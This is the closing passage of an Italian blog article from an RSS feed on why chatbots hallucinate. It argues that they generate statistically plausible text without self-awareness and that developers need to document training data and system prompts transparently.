<p>Questo episodio dimostra un punto cruciale: i chatbot <strong>non hanno consapevolezza</strong> delle proprie azioni. Non sono in grado di spiegare il loro funzionamento o il motivo per cui accade qualcosa. Si limitano a generare frasi statisticamente plausibili sulla base dei dati di addestramento.</p>



<h2 id="perche-i-chatbot-hanno-le-allucinazioni" class="wp-block-heading">Perché i chatbot hanno le allucinazioni</h2>



<p>I modelli di AI generativa funzionano con logiche probabilistiche: prevedono la parola più probabile da generare. Questo comporta che i modelli linguistici abbiano quelle che vengono chiamate &#8220;allucinazioni&#8221; (<em>AI hallucination</em>): il termine è usato per descrivere quando un modello di intelligenza artificiale generativa, come un chatbot o un sistema di text-to-image, produce un contenuto che <strong>sembra plausibile ma non ha alcun fondamento reale</strong>.<br>Questo comporta altresì che i LLM:</p>



<ul class="wp-block-list">
<li>non possono spiegare davvero se stessi;</li>



<li>non hanno memoria consapevole delle loro istruzioni interne;</li>



<li>inventano risposte quando non sanno cosa dire.</li>
</ul>



<p><strong>Senza documentazione trasparente su dati di addestramento, system prompts e meccanismi di revisione, è impossibile distinguere tra ciò che l’AI ha appreso e ciò che semplicemente inventa.</strong><br>Senza una documentazione chiara fornita dagli sviluppatori — che indichi i dati di addestramento, le istruzioni iniziali e le modalità di revisione umana — non è possibile sapere cosa realmente accada all’interno del modello.</p>



<p>Un chatbot potrà anche sembrare onesto, <strong>ma il suo mestiere non è dirti la verità: è generare la risposta più probabile.</strong></p>



<p></p>
<p>L'articolo <a href="https://luca-mercatanti.com/le-ai-non-sanno-davvero-cio-che-dicono/">le AI non sanno davvero ciò che dicono</a> proviene da <a href="https://luca-mercatanti.com">Luca Mercatanti</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://luca-mercatanti.com/le-ai-non-sanno-davvero-cio-che-dicono/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
